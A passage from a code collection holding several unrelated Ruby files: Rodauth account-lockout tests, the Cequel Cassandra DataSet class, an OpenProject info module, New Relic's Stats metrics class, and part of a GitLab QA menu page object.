r.rodauth
r.root{view :content=>(rodauth.logged_in? ? "Logged In" : "Not Logged")}
end
visit '/login'
fill_in 'Login', :with=>'[email protected]'
3.times do
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
end
DB[:account_lockouts].count.must_equal 1
visit 'b'
visit '/close-account'
fill_in 'Password', :with=>'0123456789'
click_button 'Close Account'
DB[:account_lockouts].count.must_equal 0
end
end
it "should handle uniqueness errors raised when inserting unlock account token" do
lockouts = []
rodauth do
enable :lockout
max_invalid_logins 2
after_account_lockout{lockouts << true}
end
roda do |r|
def rodauth.raised_uniqueness_violation(*) super; true; end
r.rodauth
r.root{view :content=>(rodauth.logged_in? ? "Logged In" : "Not Logged")}
end
visit '/login'
fill_in 'Login', :with=>'[email protected]'
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal 'There was an error logging in'
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
lockouts.must_equal [true]
page.find('#error_flash').text.must_equal "This account is currently locked out and cannot be logged in to"
page.body.must_include("This account is currently locked out")
click_button 'Request Account Unlock'
page.find('#notice_flash').text.must_equal 'An email has been sent to you with a link to unlock your account'
link = email_link(/(\/unlock-account\?key=.+)$/)
visit link
click_button 'Unlock Account'
page.find('#notice_flash').text.must_equal 'Your account has been unlocked'
page.body.must_include("Logged In")
end
it "should reraise uniqueness errors raised when inserting unlock account token if no token found" do
lockouts = []
rodauth do
enable :lockout
max_invalid_logins 2
after_account_lockout{lockouts << true}
end
roda do |r|
def rodauth.raised_uniqueness_violation(*) ArgumentError.new; end
r.rodauth
r.root{view :content=>(rodauth.logged_in? ? "Logged In" : "Not Logged")}
end
visit '/login'
fill_in 'Login', :with=>'[email protected]'
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal 'There was an error logging in'
fill_in 'Password', :with=>'012345678910'
proc{click_button 'Login'}.must_raise ArgumentError
end
[:jwt, :json].each do |json|
it "should support account lockouts via #{json}" do
rodauth do
enable :logout, :lockout
max_invalid_logins 2
unlock_account_autologin? false
unlock_account_email_body{unlock_account_email_link}
end
roda(json) do |r|
r.rodauth
[rodauth.logged_in? ? "Logged In" : "Not Logged"]
end
res = json_request('/unlock-account-request', :login=>'[email protected]')
res.must_equal [401, {'reason'=>'no_matching_login', 'error'=>"No matching login"}]
res = json_login(:pass=>'1', :no_check=>true)
res.must_equal [401, {'reason'=>"invalid_password",'error'=>"There was an error logging in", "field-error"=>["password", "invalid password"]}]
json_login
json_logout
2.times do
res = json_login(:pass=>'1', :no_check=>true)
res.must_equal [401, {'reason'=>"invalid_password",'error'=>"There was an error logging in", "field-error"=>["password", "invalid password"]}]
end
2.times do
res = json_login(:pass=>'1', :no_check=>true)
res.must_equal [403, {'reason'=>"account_locked_out", 'error'=>"This account is currently locked out and cannot be logged in to"}]
end
res = json_request('/unlock-account')
res.must_equal [401, {'reason'=>'invalid_unlock_account_key', 'error'=>"There was an error unlocking your account: invalid or expired unlock account key"}]
res = json_request('/unlock-account-request', :login=>'[email protected]')
res.must_equal [200, {'success'=>"An email has been sent to you with a link to unlock your account"}]
link = email_link(/key=.+$/)
res = json_request('/unlock-account', :key=>link[4...-1])
res.must_equal [401, {'reason'=>'invalid_unlock_account_key', 'error'=>"There was an error unlocking your account: invalid or expired unlock account key"}]
res = json_request('/unlock-account', :key=>link[4..-1])
res.must_equal [200, {'success'=>"Your account has been unlocked"}]
res = json_request.must_equal [200, ['Not Logged']]
json_login
end
end
it "should support account locks, unlocks, and unlock requests using internal requests" do
rodauth do
enable :lockout, :logout, :internal_request
account_lockouts_email_last_sent_column nil
domain 'example.com'
end
roda do |r|
r.rodauth
r.root{view :content=>(rodauth.logged_in? ? "Logged In" : "Not Logged")}
end
proc do
app.rodauth.lock_account(:account_login=>'[email protected]')
end.must_raise Rodauth::InternalRequestError
proc do
app.rodauth.unlock_account_request(:account_login=>'[email protected]')
end.must_raise Rodauth::InternalRequestError
proc do
app.rodauth.unlock_account(:account_login=>'[email protected]')
end.must_raise Rodauth::InternalRequestError
proc do
app.rodauth.unlock_account_request(:login=>'[email protected]')
end.must_raise Rodauth::InternalRequestError
proc do
app.rodauth.unlock_account_request(:account_login=>'[email protected]')
end.must_raise Rodauth::InternalRequestError
proc do
app.rodauth.unlock_account(:account_login=>'[email protected]')
end.must_raise Rodauth::InternalRequestError
app.rodauth.lock_account(:account_login=>'[email protected]').must_be_nil
# Check idempotent
app.rodauth.lock_account(:account_login=>'[email protected]').must_be_nil
login
page.find('#error_flash').text.must_equal "This account is currently locked out and cannot be logged in to"
app.rodauth.unlock_account_request(:login=>'[email protected]').must_be_nil
link = email_link(/(\/unlock-account\?key=.+)$/)
app.rodauth.unlock_account_request(:account_login=>'[email protected]').must_be_nil
link2 = email_link(/(\/unlock-account\?key=.+)$/)
link2.must_equal link
visit link
click_button 'Unlock Account'
page.find('#notice_flash').text.must_equal 'Your account has been unlocked'
page.body.must_include("Logged In")
logout
app.rodauth.lock_account(:account_login=>'[email protected]').must_be_nil
login
page.find('#error_flash').text.must_equal "This account is currently locked out and cannot be logged in to"
app.rodauth.unlock_account(:account_login=>'[email protected]').must_be_nil
login
page.body.must_include 'Logged In'
app.rodauth.lock_account(:account_login=>'[email protected]').must_be_nil
app.rodauth.unlock_account_request(:account_login=>'[email protected]').must_be_nil
link3 = email_link(/(\/unlock-account\?key=.+)$/)
link3.wont_equal link2
key = link3.split('=').last
proc do
app.rodauth.unlock_account(:unlock_account_key=>key[0...-1])
end.must_raise Rodauth::InternalRequestError
app.rodauth.unlock_account(:unlock_account_key=>key).must_be_nil
login
page.body.must_include 'Logged In'
end
end
| 35.122951 | 161 | 0.680358 |
b95248b6ad61ee134ac8c1987d2ed074fed07798 | 24,809 | # -*- encoding : utf-8 -*-
require 'forwardable'
module Cequel
module Metal
#
# Encapsulates a data set, specified as a table and optionally
# various query elements.
#
# @example Data set representing entire contents of a table
# data_set = database[:posts]
#
# @example Data set limiting rows returned
# data_set = database[:posts].limit(10)
#
# @example Data set targeting only one partition
# data_set = database[:posts].where(blog_subdomain: 'cassandra')
#
# @see http://cassandra.apache.org/doc/cql3/CQL.html#selectStmt
# CQL documentation for SELECT
#
class DataSet
include Enumerable
extend Util::Forwardable
# @return [Keyspace] keyspace that this data set's table resides in
attr_reader :keyspace
# @return [Symbol] name of the table that this data set retrieves data
# from
attr_reader :table_name
# @return [Array<Symbol>] columns that this data set restricts result
# rows to; empty if none
attr_reader :select_columns
# @return [Array<Symbol>] columns that this data set will select the TTLs
# of
attr_reader :ttl_columns
# @return [Array<Symbol>] columns that this data set will select the
# writetimes of
attr_reader :writetime_columns
# @return [Array<RowSpecification>] row specifications limiting the
# result rows returned by this data set
attr_reader :row_specifications
# @return [Hash<Symbol,Symbol>] map of column names to sort directions
attr_reader :sort_order
# @return [Integer] maximum number of rows to return, `nil` if no limit
attr_reader :row_limit
# @return [Symbol] what consistency level queries from this data set will
# use
# @since 1.1.0
attr_reader :query_consistency
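      # @return [Integer] page size for paginated queries from this data set,
      #   `nil` if none specified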
attr_reader :query_page_size
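      # @return [String] paging state from which a paginated query resumes,
      #   `nil` if none specified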
attr_reader :query_paging_state
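      # @return [Boolean] whether queries from this data set append
      #   `ALLOW FILTERING`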
attr_reader :allow_filtering
def_delegator :keyspace, :write_with_options
#
# @param table_name [Symbol] column family for this data set
# @param keyspace [Keyspace] keyspace this data set's table lives in
#
# @see Keyspace#[]
# @api private
#
def initialize(table_name, keyspace)
@table_name, @keyspace = table_name, keyspace
@select_columns, @ttl_columns, @writetime_columns, @row_specifications,
@sort_order = [], [], [], [], {}
end
#
# Insert a row into the column family.
#
# @param data [Hash] column-value pairs
# @param options [Options] options for persisting the row
# @option (see Writer#initialize)
# @return [void]
#
# @note `INSERT` statements will succeed even if a row at the specified
# primary key already exists. In this case, column values specified in
# the insert will overwrite the existing row.
      # @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see http://cassandra.apache.org/doc/cql3/CQL.html#insertStmt
# CQL documentation for INSERT
#
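      # @example Insert a row (illustrative; reuses the posts columns from the
      #   other examples in this class)
      #   posts.insert(blog_subdomain: 'cassandra', permalink: 'cequel',
      #                title: 'Announcing Cequel 1.0')
      #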
def insert(data, options = {})
inserter { insert(data) }.execute(options)
end
#
# Upsert data into one or more rows
#
# @overload update(column_values, options = {})
# Update the rows specified in the data set with new values
#
# @param column_values [Hash] map of column names to new values
# @param options [Options] options for persisting the column data
# @option (see #generate_upsert_options)
#
# @example
# posts.where(blog_subdomain: 'cassandra', permalink: 'cequel').
# update(title: 'Announcing Cequel 1.0')
#
# @overload update(options = {}, &block)
# Construct an update statement consisting of multiple operations
#
# @param options [Options] options for persisting the data
# @option (see #generate_upsert_options)
# @yield DSL context for adding write operations
#
# @see Updater
# @since 1.0.0
#
# @example
# posts.where(blog_subdomain: 'bigdata', permalink: 'cql').update do
# set(title: 'Announcing Cequel 1.0')
# list_append(categories: 'ORMs')
# end
#
# @return [void]
#
# @note `UPDATE` statements will succeed even if targeting a row that
# does not exist. In this case a new row will be created.
# @note This statement will fail unless one or more rows are fully
# specified by primary key using `where`
      # @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see http://cassandra.apache.org/doc/cql3/CQL.html#updateStmt
# CQL documentation for UPDATE
#
def update(*args, &block)
if block
updater(&block).execute(args.extract_options!)
else
data = args.shift
updater { set(data) }.execute(args.extract_options!)
end
end
#
# Increment one or more counter columns
#
# @param deltas [Hash<Symbol,Integer>] map of counter column names to
# amount by which to increment each column
# @return [void]
#
# @example
# post_analytics.
# where(blog_subdomain: 'cassandra', permalink: 'cequel').
# increment(pageviews: 10, tweets: 2)
#
# @note This can only be used on counter tables
# @since 0.5.0
# @see #decrement
# @see http://cassandra.apache.org/doc/cql3/CQL.html#counters
# CQL documentation for counter columns
#
def increment(deltas, options = {})
incrementer { increment(deltas) }.execute(options)
end
alias_method :incr, :increment
#
# Decrement one or more counter columns
#
# @param deltas [Hash<Symbol,Integer>] map of counter column names to
# amount by which to decrement each column
# @return [void]
#
# @see #increment
# @see http://cassandra.apache.org/doc/cql3/CQL.html#counters
# CQL documentation for counter columns
# @since 0.5.0
#
def decrement(deltas, options = {})
incrementer { decrement(deltas) }.execute(options)
end
alias_method :decr, :decrement
#
# Prepend element(s) to a list in the row(s) matched by this data set.
#
# @param column [Symbol] name of list column to prepend to
# @param elements [Object,Array] one element or an array of elements to
# prepend
# @param options [Options] options for persisting the column data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.list_prepend(:categories, ['CQL', 'ORMs'])
#
# @note A bug (CASSANDRA-8733) exists in Cassandra versions 0.3.0-2.0.12 and 2.1.0-2.1.2 which
# will make elements appear in REVERSE ORDER in the list.
      # @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #list_append
# @see #update
#
def list_prepend(column, elements, options = {})
updater { list_prepend(column, elements) }.execute(options)
end
#
# Append element(s) to a list in the row(s) matched by this data set.
#
# @param column [Symbol] name of list column to append to
# @param elements [Object,Array] one element or an array of elements to
# append
# @param options [Options] options for persisting the column data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.list_append(:categories, ['CQL', 'ORMs'])
#
      # @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #list_append
# @see #update
# @since 1.0.0
#
def list_append(column, elements, options = {})
updater { list_append(column, elements) }.execute(options)
end
#
# Replace a list element at a specified index with a new value
#
# @param column [Symbol] name of list column
# @param index [Integer] which element to replace
# @param value [Object] new value at this index
# @param options [Options] options for persisting the data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.list_replace(:categories, 2, 'Object-Relational Mapper')
#
      # @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #update
# @since 1.0.0
#
def list_replace(column, index, value, options = {})
updater { list_replace(column, index, value) }.execute(options)
end
#
# Remove all occurrences of a given value from a list column
#
# @param column [Symbol] name of list column
# @param value [Object] value to remove
# @param options [Options] options for persisting the data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.list_remove(:categories, 'CQL3')
#
# @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #list_remove_at
# @see #update
# @since 1.0.0
#
def list_remove(column, value, options = {})
updater { list_remove(column, value) }.execute(options)
end
#
# @overload list_remove_at(column, *positions, options = {})
# Remove the value from a given position or positions in a list column
#
# @param column [Symbol] name of list column
# @param positions [Integer] position(s) in list to remove value from
# @param options [Options] options for persisting the data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.list_remove_at(:categories, 2)
#
# @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #list_remove
# @see #update
# @since 1.0.0
#
def list_remove_at(column, *positions)
options = positions.extract_options!
sorted_positions = positions.sort.reverse
deleter { list_remove_at(column, *sorted_positions) }.execute(options)
end
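    #
    # Illustrative sketch (not part of the original source): positions are
    # splatted, and write options may trail as a final hash because they are
    # pulled off with +extract_options!+. The +posts+ data set is hypothetical.
    #
    #   posts.list_remove_at(:categories, 0, 3)
    #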
#
# @overload map_remove(column, *keys, options = {})
# Remove a given key from a map column
#
# @param column [Symbol] name of map column
# @param keys [Object] map key to remove
# @param options [Options] options for persisting the data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.map_remove(:credits, 'editor')
#
# @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #update
# @since 1.0.0
#
def map_remove(column, *keys)
options = keys.extract_options!
deleter { map_remove(column, *keys) }.execute(options)
end
#
# Add one or more elements to a set column
#
# @param column [Symbol] name of set column
# @param values [Object,Set] value or values to add
# @param options [Options] options for persisting the data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.set_add(:tags, 'cql3')
#
# @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #update
# @since 1.0.0
#
def set_add(column, values, options = {})
updater { set_add(column, values) }.execute(options)
end
#
# Remove an element from a set
#
# @param column [Symbol] name of set column
# @param value [Object] value to remove
# @param options [Options] options for persisting the data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.set_remove(:tags, 'cql3')
#
# @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #update
# @since 1.0.0
#
def set_remove(column, value, options = {})
updater { set_remove(column, value) }.execute(options)
end
#
# Update one or more keys in a map column
#
    # @param column [Symbol] name of map column
# @param updates [Hash] map of map keys to new values
# @param options [Options] options for persisting the data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.map_update(:credits, 'editor' => 34)
#
# @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #update
# @since 1.0.0
#
def map_update(column, updates, options = {})
updater { map_update(column, updates) }.execute(options)
end
#
# @overload delete(options = {})
# Delete one or more rows from the table
#
# @param options [Options] options for persistence
    #   @option (see Writer#initialize)
#
# @example
# posts.where(blog_subdomain: 'cassandra', permalink: 'cequel').
# delete
#
# @overload delete(*columns, options = {})
# Delete data from given columns in the specified rows. This is
# equivalent to setting columns to `NULL` in an SQL database.
#
# @param columns [Symbol] columns to remove
# @param options [Options] options for persistence
# @option (see Writer#initialize)
#
# @example
# posts.where(blog_subdomain: 'cassandra', permalink: 'cequel').
# delete(:body)
#
# @overload delete(options = {}, &block)
# Construct a `DELETE` statement with multiple operations (column
# deletions, collection element removals, etc.)
#
# @param options [Options] options for persistence
# @option (see Writer#initialize)
    #   @yield DSL context for constructing the delete statement
#
# @example
# posts.where(blog_subdomain: 'bigdata', permalink: 'cql').delete do
# delete_columns :body
# list_remove_at :categories, 2
# end
#
# @see Deleter
#
# @return [void]
#
# @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see http://cassandra.apache.org/doc/cql3/CQL.html#deleteStmt
# CQL documentation for DELETE
#
def delete(*columns, &block)
options = columns.extract_options!
if block
deleter(&block).execute(options)
elsif columns.empty?
deleter { delete_row }.execute(options)
else
deleter { delete_columns(*columns) }.execute(options)
end
end
#
# Select specified columns from this data set.
#
    # @param columns [Symbol] columns to select
# @return [DataSet] new data set scoped to specified columns
#
def select(*columns)
clone.tap do |data_set|
data_set.select_columns.concat(columns.flatten)
end
end
#
# Return the remaining TTL for the specified columns from this data set.
#
# @param columns [Symbol] columns to select
# @return [DataSet] new data set scoped to specified columns
#
# @since 1.0.0
#
def select_ttl(*columns)
clone.tap do |data_set|
data_set.ttl_columns.concat(columns.flatten)
end
end
#
# Return the write time for the specified columns in the data set
#
# @param columns [Symbol] columns to select
# @return [DataSet] new data set scoped to specified columns
#
# @since 1.0.0
#
def select_writetime(*columns)
clone.tap do |data_set|
data_set.writetime_columns.concat(columns.flatten)
end
end
alias_method :select_timestamp, :select_writetime
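    #
    # Illustrative sketch (not part of the original source): TTL and writetime
    # selections compose with ordinary column selection. The +posts+ data set
    # and its columns are hypothetical.
    #
    #   posts.select(:title).select_ttl(:body).select_writetime(:body).first
    #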
#
# Select specified columns from this data set, overriding chained scope.
#
# @param columns [Symbol,Array] columns to select
# @return [DataSet] new data set scoped to specified columns
#
def select!(*columns)
clone.tap do |data_set|
data_set.select_columns.replace(columns.flatten)
end
end
#
# Filter this data set with a row specification
#
# @overload where(column_values)
# @param column_values [Hash] Map of column name to values to match
#
# @example
# database[:posts].where(title: 'Hey')
#
# @overload where(cql, *bind_vars)
# @param cql [String] CQL fragment representing `WHERE` statement
# @param bind_vars [Object] Bind variables for the CQL fragment
#
# @example
# DB[:posts].where('title = ?', 'Hey')
#
# @return [DataSet] New data set scoped to the row specification
#
def where(row_specification, *bind_vars)
clone.tap do |data_set|
data_set.row_specifications
.concat(build_row_specifications(row_specification, bind_vars))
end
end
#
# Replace existing row specifications
#
# @see #where
# @return [DataSet] New data set with only row specifications given
#
def where!(row_specification, *bind_vars)
clone.tap do |data_set|
data_set.row_specifications
.replace(build_row_specifications(row_specification, bind_vars))
end
end
#
# Limit the number of rows returned by this data set
#
# @param limit [Integer] maximum number of rows to return
# @return [DataSet] new data set scoped with given limit
#
def limit(limit)
clone.tap { |data_set| data_set.row_limit = limit }
end
#
# Control how the result rows are sorted
#
# @param pairs [Hash] Map of column name to sort direction
# @return [DataSet] new data set with the specified ordering
#
# @note The only valid ordering column is the first clustering column
# @since 1.0.0
#
def order(pairs)
clone.tap do |data_set|
data_set.sort_order.merge!(pairs.symbolize_keys)
end
end
# rubocop:disable LineLength
#
# Change the consistency for queries performed by this data set
#
# @param consistency [Symbol] a consistency level
# @return [DataSet] new data set tuned to the given consistency
#
# @see http://www.datastax.com/documentation/cassandra/2.0/cassandra/dml/dml_config_consistency_c.html
# @since 1.1.0
#
def consistency(consistency)
clone.tap do |data_set|
data_set.query_consistency = consistency
end
end
def page_size(page_size)
clone.tap do |data_set|
data_set.query_page_size = page_size
end
end
#
# @see RecordSet#allow_filtering!
#
def allow_filtering!
clone.tap do |data_set|
data_set.allow_filtering = true
end
end
def paging_state(paging_state)
clone.tap do |data_set|
data_set.query_paging_state = paging_state
end
end
#
# Exposes current paging state for stateless pagination
#
    # @return [String, nil]
#
# @see http://docs.datastax.com/en/developer/ruby-driver/3.0/api/cassandra/result/#paging_state-instance_method
#
def next_paging_state
results.paging_state
end
#
# @return [Boolean] Returns whether no more pages are available
#
# @see http://docs.datastax.com/en/developer/ruby-driver/3.0/api/cassandra/result/#last_page?-instance_method
#
def last_page?
results.last_page?
end
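    #
    # Illustrative sketch (not part of the original source): stateless paging
    # by threading the opaque paging state between requests. +posts+ and
    # +previous_state+ (nil on the first request) are hypothetical.
    #
    #   page  = posts.page_size(25).paging_state(previous_state)
    #   rows  = page.to_a
    #   state = page.last_page? ? nil : page.next_paging_state
    #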
# rubocop:enable LineLength
#
# Enumerate over rows in this data set. Along with #each, all other
# Enumerable methods are implemented.
#
# @overload each
# @return [Enumerator] enumerator for rows, if no block given
#
# @overload each(&block)
# @yield [Hash] result rows
# @return [void]
#
# @return [Enumerator,void]
#
def each
return enum_for(:each) unless block_given?
results.each { |row| yield Row.from_result_row(row) }
end
#
# @return [Hash] the first row in this data set
#
def first
row = execute_cql(*limit(1).cql).first
Row.from_result_row(row)
end
    # @raise [DangerousQueryError] to prevent loading the entire record set
    #   just to count it
def count
raise Cequel::Record::DangerousQueryError.new
end
alias_method :length, :count
alias_method :size, :count
#
# @return [Statement] CQL `SELECT` statement encoding this data set's scope.
#
def cql
      Statement.new
.append(select_cql)
.append(" FROM #{table_name}")
.append(*row_specifications_cql)
.append(sort_order_cql)
.append(limit_cql)
.append(allow_filtering_cql)
end
#
# @return [String]
#
def inspect
"#<#{self.class.name}: #{cql.inspect}>"
end
#
# @return [Boolean]
#
def ==(other)
cql == other.cql
end
# @private
def row_specifications_cql
if row_specifications.any?
cql_fragments, bind_vars = [], []
row_specifications.each do |spec|
cql_with_vars = spec.cql
cql_fragments << cql_with_vars.shift
bind_vars.concat(cql_with_vars)
end
[" WHERE #{cql_fragments.join(' AND ')}", *bind_vars]
else ['']
end
end
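    # Illustrative sketch (not part of the original source): for a data set
    # scoped with where(blog_subdomain: 'cassandra'), this returns the CQL
    # fragment followed by its bind variables, e.g.
    #
    #   [" WHERE blog_subdomain = ?", "cassandra"]
    #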
# @private
def allow_filtering_cql
if allow_filtering
' ALLOW FILTERING'
else ''
end
end
attr_writer :row_limit, :query_consistency, :query_page_size, :query_paging_state, :allow_filtering
def results
@results ||= execute_cql(cql)
end
def execute_cql(cql_stmt)
keyspace.execute_with_options(cql_stmt,
consistency: query_consistency,
page_size: query_page_size,
paging_state: query_paging_state
)
end
def inserter(&block)
Inserter.new(self, &block)
end
def incrementer(&block)
Incrementer.new(self, &block)
end
def updater(&block)
Updater.new(self, &block)
end
def deleter(&block)
Deleter.new(self, &block)
end
private
def initialize_copy(source)
super
@select_columns = source.select_columns.clone
@ttl_columns = source.ttl_columns.clone
@writetime_columns = source.writetime_columns.clone
@row_specifications = source.row_specifications.clone
@sort_order = source.sort_order.clone
end
def select_cql
all_columns = select_columns +
ttl_columns.map { |column| "TTL(#{column})" } +
writetime_columns.map { |column| "WRITETIME(#{column})" }
if all_columns.any?
"SELECT #{all_columns.join(',')}"
else
'SELECT *'
end
end
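    # Illustrative sketch (not part of the original source): with no explicit
    # selections this yields "SELECT *"; after select(:title) and
    # select_ttl(:body) it yields "SELECT title,TTL(body)".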
def limit_cql
row_limit ? " LIMIT #{row_limit}" : ''
end
def sort_order_cql
if sort_order.any?
order = sort_order
.map { |column, direction| "#{column} #{direction.to_s.upcase}" }
.join(', ')
" ORDER BY #{order}"
end
end
def build_row_specifications(row_specification, bind_vars)
case row_specification
when Hash
RowSpecification.build(row_specification)
when String
CqlRowSpecification.build(row_specification, bind_vars)
else
fail ArgumentError,
"Invalid argument #{row_specification.inspect}; " \
"expected Hash or String"
end
end
end
end
end
| 31.80641 | 117 | 0.593011 |
6a61449f30eac1cf1d9277a8fbd8f099a93a2d13 | 1,663 | #-- encoding: UTF-8
#-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2014 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See doc/COPYRIGHT.rdoc for more details.
#++
module OpenProject
module Info
class << self
def app_name; Setting.software_name end
def url; Setting.software_url end
def help_url
"https://www.openproject.org/support"
end
def versioned_name; "#{app_name} #{Redmine::VERSION.to_semver}" end
# Creates the url string to a specific Redmine issue
def issue(issue_id)
url + 'issues/' + issue_id.to_s
end
end
end
end
| 35.382979 | 91 | 0.728803 |
79e075a740905172f5681bd269242a49b14b3ae5 | 4,620 | # encoding: utf-8
# This file is distributed under New Relic's license terms.
# See https://github.com/newrelic/newrelic-ruby-agent/blob/main/LICENSE for complete details.
module NewRelic
module Agent
class Stats
attr_accessor :call_count
attr_accessor :min_call_time
attr_accessor :max_call_time
attr_accessor :total_call_time
attr_accessor :total_exclusive_time
attr_accessor :sum_of_squares
def initialize
reset
end
def reset
@call_count = 0
@total_call_time = 0.0
@total_exclusive_time = 0.0
@min_call_time = 0.0
@max_call_time = 0.0
@sum_of_squares = 0.0
end
def is_reset?
call_count == 0 && total_call_time == 0.0 && total_exclusive_time == 0.0
end
def merge(other_stats)
stats = self.clone
stats.merge!(other_stats)
end
def merge!(other)
@min_call_time = other.min_call_time if min_time_less?(other)
@max_call_time = other.max_call_time if other.max_call_time > max_call_time
@total_call_time += other.total_call_time
@total_exclusive_time += other.total_exclusive_time
@sum_of_squares += other.sum_of_squares
@call_count += other.call_count
self
end
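      # Illustrative sketch (not part of the original source): #merge returns
      # an aggregated copy and leaves the receiver untouched, while #merge!
      # mutates in place.
      #
      #   a = NewRelic::Agent::Stats.new
      #   a.record_data_point(0.5)
      #   b = NewRelic::Agent::Stats.new
      #   b.record_data_point(1.5)
      #   a.merge(b)   # => stats with call_count 2, total_call_time 2.0
      #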
def to_s
"[#{'%2i' % call_count.to_i} calls #{'%.4f' % total_call_time.to_f}s / #{'%.4f' % total_exclusive_time.to_f}s ex]"
end
def to_json(*_)
{
'call_count' => call_count.to_i,
'min_call_time' => min_call_time.to_f,
'max_call_time' => max_call_time.to_f,
'total_call_time' => total_call_time.to_f,
'total_exclusive_time' => total_exclusive_time.to_f,
'sum_of_squares' => sum_of_squares.to_f
}.to_json(*_)
end
def record(value=nil, aux=nil, &blk)
if blk
yield self
else
case value
when Numeric
aux ||= value
self.record_data_point(value, aux)
when :apdex_s, :apdex_t, :apdex_f
self.record_apdex(value, aux)
when NewRelic::Agent::Stats
self.merge!(value)
end
end
end
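      # Illustrative sketch (not part of the original source): #record
      # dispatches on its argument: a numeric data point, an apdex bucket
      # symbol, another Stats instance, or a block operating on self.
      #
      #   stats.record(0.42)                      # record_data_point(0.42)
      #   stats.record(:apdex_s, apdex_t)         # bump the satisfied bucket
      #   stats.record(other_stats)               # merge! another Stats
      #   stats.record { |s| s.increment_count }  # arbitrary block form
      #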
# record a single data point into the statistical gatherer. The gatherer
# will aggregate all data points collected over a specified period and upload
# its data to the NewRelic server
def record_data_point(value, exclusive_time = value)
@call_count += 1
@total_call_time += value
@min_call_time = value if value < @min_call_time || @call_count == 1
@max_call_time = value if value > @max_call_time
@total_exclusive_time += exclusive_time
@sum_of_squares += (value * value)
self
end
alias trace_call record_data_point
# increments the call_count by one
def increment_count(value = 1)
@call_count += value
end
# Concerned about implicit usage of inspect relying on stats format, so
# putting back a version to get full inspection as separate method
def inspect_full
variables = instance_variables.map do |ivar|
"#{ivar.to_s}=#{instance_variable_get(ivar).inspect}"
end.join(" ")
"#<NewRelic::Agent::Stats #{variables}>"
end
def ==(other)
other.class == self.class &&
(
@min_call_time == other.min_call_time &&
@max_call_time == other.max_call_time &&
@total_call_time == other.total_call_time &&
@total_exclusive_time == other.total_exclusive_time &&
@sum_of_squares == other.sum_of_squares &&
@call_count == other.call_count
)
end
# Apdex-related accessors
alias_method :apdex_s, :call_count
alias_method :apdex_t, :total_call_time
alias_method :apdex_f, :total_exclusive_time
def record_apdex(bucket, apdex_t)
case bucket
when :apdex_s then @call_count += 1
when :apdex_t then @total_call_time += 1
when :apdex_f then @total_exclusive_time += 1
end
if apdex_t
@min_call_time = apdex_t
@max_call_time = apdex_t
else
::NewRelic::Agent.logger.warn("Attempted to set apdex_t to #{apdex_t.inspect}, backtrace = #{caller.join("\n")}")
end
end
protected
def min_time_less?(other)
(other.min_call_time < min_call_time && other.call_count > 0) || call_count == 0
end
end
end
end
| 31.643836 | 123 | 0.604113 |
616d50f47fcf888315ab84aaaeef10adc22e1bdc | 2,530 | # frozen_string_literal: true
module QA
module Page
module Main
class Menu < Page::Base
view 'app/views/layouts/header/_current_user_dropdown.html.haml' do
element :user_sign_out_link, 'link_to _("Sign out")' # rubocop:disable QA/ElementWithPattern
element :settings_link, 'link_to s_("CurrentUser|Settings")' # rubocop:disable QA/ElementWithPattern
end
view 'app/views/layouts/header/_default.html.haml' do
element :navbar
element :user_avatar
element :user_menu, '.dropdown-menu' # rubocop:disable QA/ElementWithPattern
end
view 'app/views/layouts/nav/_dashboard.html.haml' do
element :admin_area_link
element :projects_dropdown
element :groups_dropdown
end
view 'app/views/layouts/nav/projects_dropdown/_show.html.haml' do
element :projects_dropdown_sidebar
element :your_projects_link
end
def go_to_groups
within_top_menu do
click_element :groups_dropdown
end
page.within('.qa-groups-dropdown-sidebar') do
click_element :your_groups_link
end
end
def go_to_projects
within_top_menu do
click_element :projects_dropdown
end
page.within('.qa-projects-dropdown-sidebar') do
click_element :your_projects_link
end
end
def go_to_admin_area
within_top_menu { click_element :admin_area_link }
end
def sign_out
within_user_menu do
click_link 'Sign out'
end
end
def go_to_profile_settings
with_retry(reload: false) do
within_user_menu do
click_link 'Settings'
end
has_text?('User Settings')
end
end
def has_personal_area?(wait: Capybara.default_max_wait_time)
has_element?(:user_avatar, wait: wait)
end
def has_admin_area_link?(wait: Capybara.default_max_wait_time)
has_element?(:admin_area_link, wait: wait)
end
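        # Illustrative sketch (not part of the original source): typical usage
        # from a QA scenario, assuming the framework's standard
        # Page::Base.perform entry point.
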